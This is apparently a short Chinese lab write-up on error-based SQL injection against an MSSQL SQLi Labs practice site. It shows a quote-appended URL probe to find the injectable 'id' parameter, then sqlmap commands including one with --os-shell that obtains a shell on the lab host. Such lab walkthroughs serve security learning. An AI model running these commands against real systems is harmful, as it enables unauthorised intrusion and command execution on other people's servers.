SQL server基于报错的注入
1.访问MSSQL SQLi Labs网站
点击按钮,我们使用GET请求上传参数“id”,当id=1时,页面显示id=1的用户名Dump、密码Dump:
2.寻找注入点
http://[靶机IP]/less-1.asp?id=1'
运行后报错,说明我们可以利用参数“id”作为我们的注入点,根据回显我们可以判断这是字符型注入点:
直接上SQLmap吧:
python sqlmap.py -u http://localhost:800/less-1.asp?id=1
可以发现id可以作为注入点,我们直接getshell:
python sqlmap.py -u http://localhost:800/less-1.asp?id=1 --os-shell
获得了shell
后面的关卡也这么做吧。